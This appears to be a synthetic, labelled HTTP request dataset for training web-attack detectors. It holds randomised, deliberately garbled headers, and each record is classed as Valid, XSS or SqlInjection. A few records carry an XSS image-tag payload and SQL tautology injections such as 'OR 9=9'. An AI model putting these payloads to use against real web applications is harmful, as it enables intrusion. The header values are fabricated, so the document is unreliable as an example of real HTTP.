Pragma: no-cache
Proxy-Authorization: Digest uri=/8tsi1ee/nreUitch/ynlernls/rylqcbHp/vyr6.shtml
Authorization: xane0 beyo=erhrv1
Range: 6738-658640
Referer: /awxe/oruNg/cptih1/kr86.sh
TE: trailers
Trailer: User-Agent
User-Agent: sTghxYp http://www.cicNjJbx.st
UA-CPU: 68000
UA-Disp: 399,520,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 484x481
Via: 4.8 142.41.120.141, 6.8 102.165.54.186, 2ots/9.7 82.111.40.92:3
Transfer-Encoding: deflate
Upgrade: deldgt/6.6
Warning: 676 www.eeehz.gif:5 "lhoHd9aieoatonpa" "Wed, 02 Nov 05 03:33:52 UTC"
X-Forwarded-For: 122.211.194.113
X-Serial-Number: 31033243317448893710
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19222
Start - Id: 2625
class: Valid
GET /i8yeteteg8kam3rd39c/FlaBl.jpg?tc9odq=s&ueix=U6S&OVUt0=i3j-c7gl6n&noqeo0a9heaynte=xlQN9-JpMuKY&netoimeicb=e.5U&ygJ6gmeuTq=77&5atms4vndn5fod=24741253&intadj=k0rsf90&eieRw4jrg=i+ae%2Blaah+ns4t%3Fstcb&tg1rretiste=amek7oiio0o4dy HTTP/1.0
Host: www.uct2.net
Connection: safe
Accept: */*;q=0.3
Accept-Charset: windows-1253, windows-1250;q=0.2, iso-8859-9, iso-10646-ucs-2;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: e-sfTooane, 6oA7l-doerh;q=0.0, Oceui-vob20ar;q=0.6, temsloK-euaxs;q=0.6, t6Tzeg-ibeeetsL
Cache-Control: no-store
Client-ip: 251.102.229.45
Cookie: 6Ond6atfcre=mailcn<;heNmnq=rihEe)qct;5n8_ZM7tFin=8
Cookie2: $Version="224"
Date: Tue, 14 Aug 07 07:06:07 GMT
ETag: "Q-eSxUs2supfHmruUeEP"
Expect: eorh=hOsit5;eeeed
From: hcqlau@ypyesaoel.fr
If-Modified-Since: Sun, 31 Oct 04 17:54:05 CET
If-Unmodified-Since: Fri, 07 Dec 07 07:33:32 UTC
If-Match: *
If-None-Match: "hc8u5g9@.KhcEyu"
If-Range: Tue, 16 May 06 06:14:58 GMT
Max-Forwards: 418
MIME-Version: 5.0
Pragma: ie='T'
Proxy-Authorization: Digest uri=http://www.noelxt.uk/uceliu/partes/cnIjab.mdb
Authorization: Basic aW5yYXJzSmw6c2J5dWFyZA==
Range: -62003,-738
Referer: http://eanoaoE.st/n1os/ofanIvn0/rtban.dll
TE: trailers,gzip;q=0.2
Trailer: Connection
User-Agent: Mozilla/4.5 (Windows; U; Win 9x 5.1; ia-s7; rv:0.2.5) Gecko/37989728
UA-CPU: 68000
UA-Disp: 409,1827,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 907x1790
Via: FTP/4.3 130.65.198.51:00, gCe/5.2 www.giHdma.js, 5.4 91.184.137.25
Transfer-Encoding: compress
Upgrade: byS/1.8, RdEme/2.6, m61N/2.9, doa2/8.0, ntsehr/4.6
Warning: 388 www.Fet6pwu.shtml "nteouIii" 
X-Forwarded-For: 35.160.78.10
X-Serial-Number: 93836
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2625
Start - Id: 14740
class: Valid
GET /yOZ7.cfm? HTTP/1.0
Host: 158.192.149.146
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=2149
Client-ip: 149.211.102.91
Cookie: mSbXhtaccesfu=n';ulkuyreisc=omOUtalUplpeeX4;ocnn0h=aKV7m-;zrtKruJmejth=gJ79dGSrr;choo=i8dye;elxvaebanceczp=tV
Cookie2: $Version="50"
Date: Sat, 13 Oct 07 24:46:13 CET
ETag: "c1Mw@I-EJjN2BmQHyTP"
Expect: apgt6i=cyhe;gTtU=lrhkcl
From: sNpNf@3hhoojc.uk
If-Modified-Since: Sat, 20 Sep 08 14:51:36 UTC
If-Unmodified-Since: Sun, 05 Feb 06 18:10:06 GMT
If-Match: "CO3zMNeIEFkHSE."
If-None-Match: "ZQ_wOTeRemfRSjw2-fK"
If-Range: Wed, 02 Apr 08 22:42:02 GMT
Max-Forwards: 61
MIME-Version: 4.5
Pragma: e64te=Tsrhtea
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic ZW5lc2FlOnJuYnJ5aGQ=
Range: 444847-,76-,3-393
Referer: /r0cwssq/etamj/uA3t/ZsaeaE/ecee.css
TE: trailers
Trailer: Accept
User-Agent: Mozilla/3.1 (compatible; idteiNeer; Linux i386; eereaoOi)
UA-CPU: StrongARM
UA-Disp: 6549,336,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 887x095
Via: 9.3 www.rartts2.css, FTP/0.0 www.r1gnoer.htm
Transfer-Encoding: or0l; Nrqpy=Lxji
Upgrade: soe9td/9.1, sezN/9.4, ep6a/2.0
Warning: 491 www.jeuiAh5t.htm "wjeodstn" "Wed, 27 May 09 09:21:52 GMT"
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 5935364150091795
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 14740
Start - Id: 46791
class: XSS
POST /sogmdnwaeoc2bso/hne0ojnsyellld7/bOMY-wT/rA0cr8ObW/iSZh4/iyigdepSes/boot.iniuihtacces.tiff? HTTP/1.0
Content-Length: 294
Content-Language: evhu,tkt
Content-Encoding: gzip
Content-Location: http://cOoonaa.com/qtomT/icInpRi/0htNaeE.tar.gz
Content-MD5: ajB0eXI0aWNsb29oSW1obQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Oct 09 16:11:59 UTC
Last-Modified: Fri, 12 Nov 04 12:19:06 GMT
Host: 210.84.232.145
Connection: 1ju6eid
Accept: audio/*, application/zip
Accept-Charset: ks_c_5601-1987, x-mac-hebrew, hz-gb-2312
Accept-Encoding: compress, compress
Accept-Language: *
Cache-Control: 0i5nn9eo='wtihioG'
Client-ip: 160.46.236.124
Cookie: lywtVen=8
Cookie2: $Version="17"
Date: Sun, 03 Aug 08 11:45:49 UTC
ETag: W/"w6tFK0pcm3oEf.Rt"
Expect: Ksasyns
From: fnwte@lpuewgs.de
If-Modified-Since: Thu, 09 Jul 09 04:26:48 GMT
If-Unmodified-Since: Mon, 31 Mar 08 23:58:29 GMT
If-Match: *
If-None-Match: *
If-Range: "oMiSPy4UkejBMD1Ydkw5"
Max-Forwards: 80
MIME-Version: 5.1
Pragma: rdhe=a
Proxy-Authorization: Basic RDBlQWk6ZWloNg==
Authorization: NTLM ZXRDdWl1YVJvT3czbXU4aGh3czNvY2doc3J6ZGUweW5hanFlZW1xZWMxRQ==
Range: 833-
Referer: /4olhpLg/pd4e.mp3
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: boixtas/5.8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 818x5674
Via: 4.2 95.239.189.82, eneyo/9.0 181.234.52.117
Transfer-Encoding: gzip
Upgrade: uugt9t/7.7, bihs/8.6, ei8Or/1.6, cnflaa/4.8, 1yu/6.0
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 90.168.251.169
X-Serial-Number: 80684101
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

toooaVAw0onr=03503&djn1stot4=e nbfmtgroup byiu&Msimrwis=crvE&at8dxe3ptnrun=staenmg2anRsfeIe&tsos6euxlsmatr=g input&stelv44co=<img  src=&{[alert    ('ointc');]}; >&MRT9=t3etnhteegetrete&toiueatla=oalSzn2s/eTR&uAsriaputtrlO=nnlHf5no 0dPnaccept]Rtae7&Stn=un Ma]qn

End - Id: 46791
Start - Id: 14802
class: Valid
GET /wUpX5YSdMb/alem/ek0l9s/rr/yaw/zsurj.mspx?pechod3@L@input=tlah&ch3aaiZfe=i9tT&WaHU_GD4h=detbitfsb64&5nnseanheo6cpt=65642111&speylnhlirnt=trvbscriptshb5vrrrall+Bw&atrsjrt=Erietu&so=66183030&3ga=osemnhtscriptn4ed&tzae=280&sdf@qAMsperl9=sL7ObCjIYaI&m3a=8ehXEoRuoinclude8pn%28eaaen&eet2mroai4d6tn=08685 HTTP/1.1
Host: www.gyvtet.st
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-korean;q=0.7, koi8, x-mac-cyrillic;q=0.1, cp-932
Accept-Encoding: *;q=0.9
Accept-Language: aexJ-6h;q=0.3, hsr-nd;q=0.4, aib-laOzm, EtSszyh-fr5, Meltt-mf5dd;q=0.5
Cache-Control: max-age=37
Client-ip: 71.239.247.8
Cookie: Nnpopt=66243645;snn7rfe=5107454862;SHnBE9GUSlK=85667693;aBm7oosTggh=163;MiH8=G:winnt4haarxioo-t?3ug
Cookie2: $Version="24"
Date: Fri, 09 Dec 05 19:06:15 CET
ETag: "ht4@51kpRSs3WSZa"
Expect: 100-continue
From: nOeesl@pemet.it
If-Modified-Since: Tue, 17 Jan 06 19:37:47 UTC
If-Unmodified-Since: Tue, 15 Nov 05 18:37:23 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 06
MIME-Version: 6.3
Pragma: rcst='o'
Proxy-Authorization: NTLM dGhpb3R2bWRuZGVFczlicm50ZW5zd2VsVGxvZW9lYXVlN2Fp
Authorization: Basic bnZyc1RvOmRZMWFh
Range: -5,-352
Referer: http://www.piedutnm.de/tunrro/elhm/dfnoyYsp/gzy4.mpeg
TE: gzip;q=0.1,trailers,chunked
Trailer: Transfer-Encoding
User-Agent: sNLh12T http://www.z4ehi.net
UA-CPU: MIPS
UA-Disp: 9935,4527,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1451x6345
Via: scOtu/1.9 www.AhtaOohe.png:29, 3.5 54.26.69.112
Transfer-Encoding: identity
Upgrade: 1s0oa/6.2, rar/3.6, oi9ah/7.0
Warning: 574 www.zuisfti.js "sihgc2iasu" "Sun, 21 Aug 05 05:36:33 CET"
X-Forwarded-For: 0.184.13.124
X-Serial-Number: 48297447626041948628
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14802
Start - Id: 16885
class: Valid
GET /1LTkWovLL/s9ru4hOg-d/agpTlhafI/9Zt/re2AcixSuce.exe?leiailzdrir=sllnusLeem4a&access_logxJ99cc8wMi=psmtoe%24asock_streamsNk HTTP/1.0
Host: www.tTaotAwr.ch:725
Connection: close
Accept: audio/*
Accept-Charset: x-mac-greek, shift_jis;q=0.0, euc-kr;q=0.7
Accept-Encoding: *
Accept-Language: nx-dee, tlsctre-4o1rato3
Cache-Control: no-store
Client-ip: 16.48.87.218
Cookie: ism8hhtd8eH=0plinkechoj;ncNttocEesc=1sioytladt3le;drydhDsnocr=6;EsienzicpwbrY=deeuflGejtq4r;siislarnglshrh=002
Cookie2: $Version="7"
Date: Wed, 30 Mar 05 07:37:21 UTC
ETag: W/"vkM9y@_uojtRj3CKeLK"
Expect: rawdunO=nst6
From: pwexendA@yugteithg.uk
If-Modified-Since: Sat, 15 May 04 01:30:45 GMT
If-Unmodified-Since: Wed, 15 Mar 06 20:25:14 UTC
If-Match: "RkuUz7V5r8dQaEKV"
If-None-Match: "-oluy8U2@u@zymPL"
If-Range: Tue, 05 Feb 08 21:09:40 GMT
Max-Forwards: 3
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic MnNzckdkazppYWVhd3JsNQ==
Authorization: NTLM ZXJ0M25ybnVyaWNtcVplbnRkNzduaWFhZTB0bXJzbkVpZHNBdGUyZWVvZW9o
Range: 431-,58-633271
Referer: http://www.OuHmsa.de/nas74u/biqesot/menxodRa/gnatoee.mspx
TE: gzip;q=0.3,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/7.4 (compatible; wdls; Open BSD i586; trjaqrx; ETopixgpx; adT0nry6I4)
UA-CPU: 68000
UA-Disp: 3594,2182,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 124x8989
Via: 2.7 www.isaB.jpeg
Transfer-Encoding: gzip
Upgrade: osu/3.4, lZote/5.0, bbZap/2.0, oA2/8.9
Warning: 024 248.14.211.213 "tommso7teoesEnlsd" 
X-Forwarded-For: 12.168.61.248
X-Serial-Number: 81135810517
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16885
Start - Id: 25239
class: Valid
GET /tzbiFs2d8P2/mpx/aOtq/fJ3e1JkVU4y@VExC-l.php?afbae=m0YRd8yoBwNl&1ron0=ecnsaw%5Cformr%5CU&B.access_logXGFo.h=398215&eophtt=t8jiQDnKT_s&EsF1sam57m_copy=ailm84Se&uscsveiu=hice&vrewrs1dshe=7868168789&mNguwutToii=epg5toalrnsoecnrep&ecNugfn9sdode=rehs5&KRfw1SLfE5=l%5DpwI9body%3Byit&v8tesatgqm=ep9l&c9dhib7rpsr=erohyowf6eewrhe HTTP/1.1
Host: 108.215.174.28:80
Connection: close
Accept: */*
Accept-Charset: euc-cn, iso-8859-2, isiri-3342;q=0.0, iso-8859-6
Accept-Encoding: 
Accept-Language: s-3etasre;q=0.5
Cache-Control: max-age=41
Client-ip: 118.12.14.153
Cookie: xjxzinsertf5includec2=tbZMYpDw9y5;ieomsthaor8otu=tamrnehFesnph-dhst;kr=E4eiedi1ibrit;_ZTI=asdl
Cookie2: $Version="146"
Date: Wed, 16 Jun 04 01:24:39 CET
ETag: "Z9CUrSyiIpzpSdh"
Expect: eseAm=diaos3
From: k4NgNry@tf92Cos.be
If-Modified-Since: Sat, 07 Jun 08 24:06:02 CET
If-Unmodified-Since: Mon, 24 Apr 06 24:34:21 CET
If-Match: *
If-None-Match: "Q-HKpZc0jnvW8ry8CL"
If-Range: Thu, 07 Jan 10 17:59:26 UTC
Max-Forwards: 4
MIME-Version: 3.2
Pragma: c=w
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic ZXBoNXdmbjplNG1ybm9v
Range: 95085-,-05
Referer: /nrsmmis/tpHAierp/lrdt/eaeeweet.cgi
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/3.8 (Machintosh; U; Mac OS X 2.9; 0c-To; rv:9.4.4) Gecko/28537496
UA-CPU: PowerPC
UA-Disp: 9408,4214,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 765x9448
Via: HTTP/8.8 55.253.72.112:50575
Transfer-Encoding: gzip
Upgrade: 4DTm/7.9, 4nd/2.1, blaaL/7.8, bsr8r4/1.2
Warning: 918 55.192.214.218 "yrea68tpe" "Wed, 13 Jan 10 14:40:57 GMT"
X-Forwarded-For: 128.219.12.193
X-Serial-Number: 03225411039341
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25239
Start - Id: 41821
class: SqlInjection
GET /3BAfA9ohahqitnate.asp?3lntosuiArce=seare&oFtrr7hzmtteea=%2Bl2s&iahoFcdtnE=08&2O=%3Btmlouv6rAh&np2Luimannzies=script+e6%3D&ZXnHhLexecE=e1Lgo&oaeo=6&iht0=tabsehetchaeNdt&nhomeNWI=OrigText%27OR%27ctnlm%27++++%3D+%27oiomsx%27&rfoeorln0ercr=iBML&ezhe=Wp3positionv%3Bxf%2Fs%3Fe1wp-thj+s&lToliAemdmR=uTins.A&kFq-3wuxX@=sformN+k&maeetjorioae=eeseioit3Tnrn HTTP/1.1
Host: 205.115.59.134:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: konUle-eac3, sG7sleg-rcdsghi;q=0.8, Egt-9totmz;q=0.6
Cache-Control: max-stale=12
Client-ip: 200.70.15.74
Cookie: hiae=5;8etgsipEtseAeiu=dnleydsnt jecl3Rmochahomebc
Cookie2: $Version="1"
Date: Sun, 28 Nov 04 21:10:20 UTC
ETag: W/"0XlHTxH35WeIKuykw3"
Expect: 0hebgg
From: t9iXwsen@4teno.be
If-Modified-Since: Sat, 04 Mar 06 05:39:39 UTC
If-Unmodified-Since: Thu, 31 Jul 08 21:44:13 GMT
If-Match: *
If-None-Match: "cCddMlT9Dyf7Y4L"
If-Range: Thu, 14 Jul 05 08:17:28 CET
Max-Forwards: 6
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM dlJEMDk5ejNIdWhzd2x0ZXBpeXRkbnRzaWFvczdpdGVtdGxuYmxoYWFxcGloaw==
Authorization: l0xeni hmUagdb=rhoIa
Range: 1-,-175130,8812-321864
Referer: /ataeym5/eDtnteh/7n4djeeN/9nbgce/onpc2elh.bin
TE: deflate;q=0.6,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/9.1 (Windows; U; WinNT 1.3; fr-r5; rv:3.5.3) Gecko/72886132
UA-CPU: StrongARM
UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8410x009
Via: 2.4 www.mhOtIl.jpg, 7.3 www.nrOdyt.jpg
Transfer-Encoding: 7aSW8
Upgrade: ufar/3.7
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 431124702375
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41821
Start - Id: 29378
class: Valid
GET /uszuY1MsJusl4v/PdrcpP/na202YNLoVo1sgm/tirn0loyxR/tQnx-lp/zSscripttNowinntDbgsoundFD/arern/rg/hAduAZ_9sZ/jJK8opEoD3NAa/ernoxgo0/hea.sh?5_sS@Reqd=ady&oibaStsg6shi=a+at%3B6%29%5CiN9r%2BCldlrPT&oe4nlIrNtis=0&plprdi9srdn=845906&B7cN2R6ina=ixMKxXH8w&SyuhtpassY4t2lrek=%7Cojme&q3AHlwprocessing-instruction=mnK76tz4&zskDAeutspaqh=iconnectUaDmochaduuh&3eUpuXt6n7ig=3eeoehp8clcs&drCerthmhrehedl=te4st+ohlhsIor42pe&iuaf=585717&wuh=7eIsh3yEoda&rsntlovaeaeqp=o2HYxEcmMb2R&Aeff=9tyxp_des&b9maeoy9=9402890 HTTP/1.1
Host: www.tHi5eincrx.be:80
Connection: close
Accept: image/*, image/*;q=0.4, audio/x-wav;q=0.1
Accept-Charset: cp-950;q=0.5, iso-8859-4;q=0.1, windows-1252, x-mac-chinesesimp;q=0.9
Accept-Encoding: *
Accept-Language: eeh-ibiutx, dgcu-aiqaqSri, a2N-HnY;q=0.5, a3he-eso, e-0gs
Cache-Control: no-store
Client-ip: 167.36.208.51
Cookie: IWbFnullXSselectJjm=9
Cookie2: $Version="515"
Date: Mon, 10 Mar 08 03:51:29 UTC
ETag: W/"fA3ZKS2Ci0QFLw9dz13"
Expect: 100-continue
From: ettae@erec.de
If-Modified-Since: Tue, 23 May 06 21:10:27 CET
If-Unmodified-Since: Tue, 07 Aug 07 17:42:50 UTC
If-Match: "5smwHpaNl4_0UvlxV5yU"
If-None-Match: *
If-Range: Mon, 08 Aug 05 03:31:54 CET
Max-Forwards: 465
MIME-Version: 1.0
Pragma: je9='TglkqE'
Proxy-Authorization: aaits m7dhf=46hal26a
Authorization: tdme trb0se=Acbhpc
Range: 60-931,-49,8-736
Referer: /etvska.swf
TE: trailers,chunked,deflate
Trailer: User-Agent
User-Agent: huitm/3.6
UA-CPU: StrongARM
UA-Disp: 468,4853,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 183x157
Via: HTTP/2.1 www.6yeutv.htm
Transfer-Encoding: gzip
Upgrade: iaepj/3.1
Warning: 447 169.93.32.223 "aIpcxkf8sawnqanmjire" "Tue, 19 Aug 08 09:49:59 UTC"
X-Forwarded-For: 2.168.186.132
X-Serial-Number: 50755741783
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29378
Start - Id: 11414
class: Valid
GET /V9psgQBnullS-LtJ.l@/3Rd.ftp5/ttlBKwNmdsnne/lgkHeEetvhBtoseenfp/nbz.htm?LgPJWperlwget=eleoige1&soduet=4&cq7@sJNvF=aJV.&spynsfgb=26278&sbeknn=iytt8child+erhaving&geihsdwsordLdtn=a&7fsDrratabbi=d&ore7rbte=192&phpavyG76YW7-=esam&Oft_Hhtpassj=l1DL&McerJb=eu%29rrbeoaiw%2F%28boot.inin0del HTTP/1.0
Host: www.wiwnsbeP.cz
Connection: close
Accept: audio/x-wav, application/postscript
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.1
Accept-Language: yafzirl-Niaiots, engtet-9e8e4mio;q=0.4, S-E7taye;q=0.1, ssavt1-tiy;q=0.4, gumsnh26-ltse
Cache-Control: no-cache
Client-ip: 148.233.33.178
Cookie: oelrovNHt3=nQ0Gaf;isEaezn=977415
Cookie2: $Version="67"
Date: Wed, 21 Apr 04 06:34:14 CET
ETag: W/"wQ983bMyayPoQi5C84z."
Expect: 100-continue
From: Os6stee@odgijfte0u.ch
If-Modified-Since: Mon, 18 May 09 07:10:27 GMT
If-Unmodified-Since: Fri, 06 Feb 04 17:50:01 GMT
If-Match: "QYsZg6QbJTjOK@_"
If-None-Match: "7eVv2l8uCz_i637pI7"
If-Range: *
Max-Forwards: 6
MIME-Version: 4.6
Pragma: mnh=cteoa
Proxy-Authorization: Basic bXNpcmZqdzpvbGZCam5l
Authorization: Digest qop=auth-int
Range: -56,26-
Referer: /5swvsto/hSesaohA/riyib/iAii/ihsaei.png
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/8.6 (compatible; MSIE 4.8; Win98; eqeo; 1qDO; nodsmT79ts)
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 380x1779
Via: s6nas/1.5 www.onE7iut.png, gizxei/3.3 www.akcboe.jpg, o0c/7.4 154.87.222.234
Transfer-Encoding: identity
Upgrade: ahoel/3.1, wtEif/8.0
Warning: 602 88.249.39.89 "aeraeytusrieOtkxPo" 
X-Forwarded-For: 194.171.248.197
X-Serial-Number: 550681
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11414
Start - Id: 34895
class: Valid
POST /aYVidCHQj.VUyZYJNI/HjLozhidahoxCe3rosot/eWjSp@mcG9AP0mVqFnwm.jpeg? HTTP/1.1
Content-Length: 128
Content-Language: seo6awci
Content-Encoding: identity
Content-Location: /npeiUi/YtvitnMt.jpg
Content-MD5: aGRuNjZhRTZ0cm9vdGkydA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 22 Dec 08 18:31:42 UTC
Last-Modified: Thu, 03 Jan 08 11:58:35 UTC
Host: 124.90.69.44:2
Connection: tsped
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: hoakne-a3aoej;q=0.3, 2sumep-oyojeA8h
Cache-Control: max-age=510
Client-ip: 180.36.30.16
Cookie: EessDtnircroso=npuu;rlo2a3Xyxitmt=0830346;PiCHwinntx=08;01ddtaEdaci=8312;33caea9u=80
Cookie2: $Version="9"
Date: Wed, 06 Jun 07 20:00:39 UTC
ETag: "v_aeITxqGo4O3-8k2YwZ"
Expect: 100-continue
From: aioNe@o85EoEesvN.org
If-Modified-Since: Thu, 06 Jan 05 22:22:57 UTC
If-Unmodified-Since: Wed, 14 Mar 07 19:44:38 UTC
If-Match: "VujQqFMHTokHh.3F9ulC"
If-None-Match: *
If-Range: "e2vk9np6.6EwFJ3i"
Max-Forwards: 75
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest nc=72e2B70C
Authorization: Basic eXRpcHV2Om5PYTY=
Range: 817-
Referer: /arnkHt2/reiH/arIr.doc
TE: deflate;q=0.6,trailers
Trailer: Trailer
User-Agent: Mozilla/7.4 (Windows; U; Windows NT 6.5; i1-nt; rv:9.7.3) Gecko/19213216
UA-CPU: MIPS
UA-Disp: 559,503,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0430x9866
Via: 1.1 www.antl5.js, dUtc/5.2 245.103.78.196
Transfer-Encoding: compress
Upgrade: minhlz/2.0, gtr/0.2, nusiot/8.5
Warning: 293 www.ds0swdh.css "fM4geas0hcalM" "Sat, 19 Aug 06 22:31:17 GMT"
X-Forwarded-For: 166.63.210.130
X-Serial-Number: 77838287681504099212
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wno=024105&Ciaem=lteltrviiov&Chqfni8g=373&xtyieooagsbe=I dhucsamov&6XegaebMe=0625720&tnwdhotcedeSlei=jp4(te e&eissllrbesc=7tib

End - Id: 34895
Start - Id: 29811
class: Valid
GET /a8mlvoa/gwTHD/uIhLfJ@Y.png? HTTP/1.1
Host: 213.111.169.4:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-8-i
Accept-Encoding: identity
Accept-Language: o-p2Ar
Cache-Control: no-transform
Client-ip: 173.222.100.215
Cookie: crn=Q'n-haro0dservicesernnzlocation ls;eohAunekvis=c.Mb@UM;uy1ooenee1e=mgrxfBStj;elugct=4qosautfi8nh3
Cookie2: $Version="73"
Date: Wed, 13 Jul 05 16:19:59 CET
ETag: W/"qOja.8bmoYJ0.nDl"
Expect: Ffelot
From: 4hgys@hnenh.de
If-Modified-Since: Tue, 28 Feb 06 23:37:55 GMT
If-Unmodified-Since: Thu, 17 Dec 09 02:53:25 UTC
If-Match: *
If-None-Match: "@7TF.M24Wsx-Yx."
If-Range: *
Max-Forwards: 432
MIME-Version: 0.0
Pragma: nynkwd=ee
Proxy-Authorization: al17t nuoirww=cirn
Authorization: Basic OTAwWW1lOjlpaWU=
Range: 2-,-34748,32-787788
Referer: /vJsOaavI/4rtahvdt/omTkfFoc/6mrkp/H9bhun.jsp
TE: trailers,gzip;q=0.2
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.8 (Windows; U; WinNT 8.5; 7s-ad; rv:1.0.4) Gecko/18386168
UA-CPU: 68000
UA-Disp: 793,154,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 928x800
Via: 4.6 23.19.97.164, HTTP/8.8 248.84.228.162
Transfer-Encoding: deflate
Upgrade: hoc/9.0, nsaeuh/2.0
Warning: 660 115.113.218.243 "leie6fem" 
X-Forwarded-For: 22.79.136.228
X-Serial-Number: 9258897383132
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29811
Start - Id: 42213
class: SqlInjection
GET /hs/aykE5c1NBYWV1d4D/3RG3o/a3MQ/sCBE2MXmSn/tqBTkV3qt/UtR/ttrxol/9h4_eF/asmtde7eut3yo7/eigvbCyaa.jsp?cd=4c&aoeh=94739940&kBlR@JVwUpasswdMn=rsiR&oeio=notAxl%7E5t&v2rgeseao=lvcgi9LL%40Q&NOMlZJ=3412&9osis1epstEjt7o=nv3geereos4e&tmvospahuwmh=+w&xt=OR+9%3D9&jCAXv=nfirpi9s+so%5Cjw%3FI96%28&nrlleyetsi=i&i8uY_9kMxlocation_=lbuIw&ifdl=h_D%402j%40&TN.of7p3mwp-M=tr&Ukuhifle=580544527 HTTP/1.1
Host: 73.191.187.185:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-8859-8;q=0.2, koi8, cp-950, cp-932, isiri-3342
Accept-Encoding: identity, gzip, compress;q=0.0, identity, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 110.245.212.227
Cookie: WoCS=e) lwu-0iprw
Cookie2: $Version="62"
Date: Sun, 22 May 05 02:00:00 GMT
ETag: "jnwaRyqJQM7oz-COR@"
Expect: Loobi=oDnd
From: 6bttom@2kOpyg.org
If-Modified-Since: Wed, 04 Jan 06 16:24:30 UTC
If-Unmodified-Since: Wed, 24 Aug 05 23:43:17 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Feb 05 21:31:27 UTC
Max-Forwards: 1215
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM ZE5lVG9hbGlzZWw1ZGh4b3RxYXlvZHRyMHRxZWl3bGNObmg=
Authorization: NTLM QXRzYWhlaXpxaTB3aTJsbm5pcGh0c2FudU9oTmFlcmU=
Range: 8473-303,-227666,770360-
Referer: /2olikdtr.zip
TE: trailers
Trailer: Max-Forwards
User-Agent: nvhrmiki/8.5.0.8
UA-CPU: x86
UA-Disp: 327,4301,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: HTTP/6.0 www.4Rhenek.png, 2.3 55.178.217.85, 8.9 www.oair3ii.png:19
Transfer-Encoding: gzip
Upgrade: he8e/9.1, uArqem/3.7, oettlh/8.9
Warning: 076 127.171.181.93 "tSr36i2" 
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 32378960313
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42213
Start - Id: 20549
class: Valid
GET /slBZelUs5cYNsFIiq/y2mieH68/oMr8Ct/aEebnL1essticsiiitt/t5AF.ilUxF.dll? HTTP/1.1
Host: www.drr19fnaee.ch
Connection: d92aa
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=64
Client-ip: 156.18.49.58
Cookie: MTwhere_GJAW=>having1s;ce=1078407;tiurwaeeqmfi=td
Cookie2: $Version="2"
Date: Sun, 02 May 04 07:11:27 UTC
ETag: W/"dCO8iTzVmOmwUz5JP"
Expect: dshist4m=aluottf;sEySliE
From: Asueb@eQRotdsK.ch
